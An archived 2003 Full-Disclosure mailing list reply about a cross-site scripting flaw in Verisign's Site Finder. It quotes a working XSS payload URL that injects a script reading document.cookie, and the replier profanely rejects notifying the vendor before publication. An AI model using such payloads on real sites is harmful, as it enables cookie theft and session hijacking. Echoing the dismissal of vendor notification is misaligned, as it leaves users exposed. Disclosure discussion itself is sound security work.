[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-Disclosure] Global *.net XSS, thank you Verisign(TM)
- To: Jedi/Sector One <j@xxxxxxxxxxxx>
- Subject: Re: [Full-Disclosure] Global *.net XSS, thank you Verisign(TM)
- From: "J.A. Terranson" <measl@xxxxxxx>
- Date: Tue, 16 Sep 2003 18:56:03 -0500 (CDT)
On Tue, 16 Sep 2003, Jedi/Sector One wrote:
> On Mon, Sep 15, 2003 at 08:35:43PM -0700, xss_slut@xxxxxxxxxxxx wrote:
> > with a XSS bug, this works in IE:
> > Other less exciting versions of this XSS:
> > http://sitefinder.verisign.com/lpc?url=meow'><script>alert(document.cookie)</script><'
>
> Did you _at least_ tell Verisign about this before posting this?
Fuck giving them so much as a MOMENTs notice. Like they gave us notice with
their wildcard BS. Fuck Verisign. Fuck them dead.
--
Yours,
J.A. Terranson
sysadmin@xxxxxxx
"Every living thing dies alone."
Donnie Darko
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html